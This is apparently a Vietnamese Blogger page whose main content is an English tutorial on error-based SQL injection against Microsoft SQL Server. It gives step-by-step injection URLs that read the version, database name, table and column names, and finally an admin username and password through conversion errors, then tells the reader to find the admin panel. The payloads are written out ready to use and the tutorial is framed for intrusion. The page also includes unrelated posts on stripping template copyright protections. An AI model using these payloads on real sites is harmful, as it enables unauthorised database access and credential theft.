Chuyển đến nội dung chính

MSSQL INJECTION


This article is related to mssql Injection.
There are few ways to determine the vulnerability for this
injectionyou can put quote (') at the end of url and it will show
error like

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the ID integer '5' '.
index.asp, line 30

www.target.com/index.asp?id=1 and 1=1-- Load Perfect

www.target.com/index.asp?id=1 and 1=2-- Mssql Error

if 1=1 does make it load perfectly we may need to put quote (string) '+and+1=1--+-
okay in our case we have mssql error page

FIND DATABASE, VERSION

mssql injection queries are not really difficult :) if you have good knowledge in mysql injection, its not that tough for you ..
SO I will not be covering on mysql injection basics :)
watch my previous tutorials
How we can find our database?

+and+1=convert(int,@@version)--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,@@version)--

and like it we can find our database by using this query

+and+1=convert(int,db_name())--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,db_name())--
and same for user name
'+and+1=convert(int,user_name())--

Extracting Table names from database

We Will be using NOT IN method to find table names
we can only fetch table names one by one. that is really pain in ...... :p
so lets fetch first table name from database , our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

real time example

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

lets say our first table is : table1
lets now find 2nd table name, then our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

Real time example:

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

and for third table we use


www.target.com/index.asp?id=1+and+1=convert
(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1','table2')))--

Fiding Column names

okay so now we have our table names but we dont know how to find column names in those tables?
lets say we want to find columns of table1
we will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

In URL it will be like

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

Note: table1 is the name of table

Now Lets see the error message

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
index.asp, line 30

So if we look carefully we will see column name in this error that is "username"

Now.. we have our first column name, how to find next column?
We will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+
where+table_name='table1'+and+column_name+not+in+('username')))--

in URL

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'+and+column_name+not+in+('username')))--

okay lets say this time error show the column_name is 'Password'
So this is how things work in NOT IN method.


okay, Now we have tables and their column names but we dont know how to extract entries from these tables and columns

lets say we have column name username in table table1. To get its entries we will use query like:


+and+1=convert(int,(select+top+1+username+from+table1))--
Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin@site' to data type int.

index.asp, line 30

admin@site is our required username

and so for password we will use

+and+1=convert(int,(select+top+1+password+from+table1))--

In URL:

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+username+from+table1))--

Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'adminPass123' to data type int.

index.asp, line 30

SO now we have admin username and admin Password. Just find the admin panel and bangg

Thanks for reading this tutorial

regard's

Nhận xét

Bài đăng phổ biến từ blog này

[Blogger] Gỡ bỏ bản quyền template Blogspot không bị chuyển hướng

Xin chào các blogger, hẳn khi làm blog bạn chẳng còn xa lạ gì những trang cung cấp template nổi tiếng như soratemplates, gooyaabitemplates,... đúng không. Mỗi khi bạn tải template về thường có 2 tùy chọn đó là bản free và bản premium. Sự khác biệt giữa chúng là quá rõ ràng kể đến như support hoặc mã hóa code,...


Dân nghèo như chúng ta thường chỉ chơi bản free thôi, và đương nhiên sẽ có nhiều template dính quả bản quyền thần chưởng, ở đó thì họ thường gắn tên vào cuối footer và khi ta xóa dòng đó đi web site sẽ tự động chuyển hướng tới trang chủ của họ. Nói chung ta không nên xóa bản quyền template đi vì đó thể hiện sự tôn trọng tới người đã tạo ra template cho ta sử dụng.

Còn trong khuôn khổ bài viết này hung1001 sẽ cùng bạn tìm hiểu cách gỡ và thêm bản quyền của bạn vào nếu như bạn thích.


Ở đây tôi làm mẫu với template Treasury của Sora bản free. Đây là dòng tác giả đã chèn bản quyền và có đoạn js điều hướng nếu dòng bị xóa


Nhiệm vụ của bạn đó là đi dò toàn bộ các đoạn mã js đã bị mã hó…

[Blogger] Tạo hiệu ứng tuyết rơi chào đón Noel cho blogspot

Noel sắp đến để tăng thêm hiệu ứng cho blog của bạn hãy thêm vào 1 chút hiệu ứng tuyết rơi để cho không khí thêm sôi động


Cách làm cực kì đơn giản:

Đăng nhập vào blogChọn mẫu và vào phần chỉnh sửa htmlBạn để đoạn code sau vào giữa cặp thẻ <body> ... </body>
<script src='https://cdn.rawgit.com/hung1001/blogspot/master/js/tuyetroi.js'/>

Code nhúng trực tiếp vào web không thông qua host

<script type="text/javascript">
//<![CDATA[
var snowmax=100
var snowcolor=new Array("#f2f8fa","#eff5f7","#dcedf1","#ffffff")
var snowtype=new Array("Times","Arial","Times","Verdana")
var snowletter="*"
var sinkspeed=1
var snowmaxsize=30
var snowminsize=20
// Set 1 for all-over-snowing, set 2 for left-side-snowing
// Set 3 for center-snowing, set 4 for right-side-snowing
var snowingzone=1
// Do not edit below this line
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
v…

Share Template Mudah Grid Responsive.

Chào mọi người, dạo gần đây mình thấy có một bản mẫu blogspot đi kèm với một giao diện khá thân thiện nên mình cũng đem về rồi nhờ người anh em thân thiết xóa cái bản quyền template đi rồi share cho anh em dùng.  ƯU ĐIỂMLoad nhanhSEO tốtChuẩn responsiveRecent labelButton ShareFollow by emailBreadcrumbs...NHƯỢC ĐIỂMThì mình chưa tìm ra. Cách nhận template- Comment link share trên mạng xã hội ( tùy tâm ) - Comment mail phía dưới. Lưu ý: Bản này hoàn toàn đã xóa bản quyền rồi nhé.
Xem Demo